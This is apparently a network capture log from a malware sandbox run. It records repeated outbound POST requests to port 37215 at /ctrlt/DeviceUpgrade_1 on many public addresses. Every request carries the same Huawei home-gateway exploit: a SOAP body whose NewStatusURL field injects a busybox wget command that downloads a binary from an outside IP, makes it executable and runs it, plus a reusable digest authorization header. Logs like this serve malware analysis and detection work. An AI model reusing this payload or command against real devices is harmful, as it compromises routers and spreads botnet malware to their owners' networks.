20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1441192.168.2.155623241.105.150.7037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734510899 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1442192.168.2.154128041.24.87.17237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734513044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1443192.168.2.153694241.154.16.24437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734515905 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1444192.168.2.153982241.121.207.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734550953 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1445192.168.2.155525241.24.69.4637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734550953 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1446192.168.2.154794241.137.92.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734580994 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1447192.168.2.155013041.216.216.2637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734581947 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1448192.168.2.153466841.103.49.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734596968 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1449192.168.2.154504241.207.138.637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734601974 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1450192.168.2.154361841.242.166.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734627008 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1451192.168.2.155314641.189.46.14937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.734637976 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
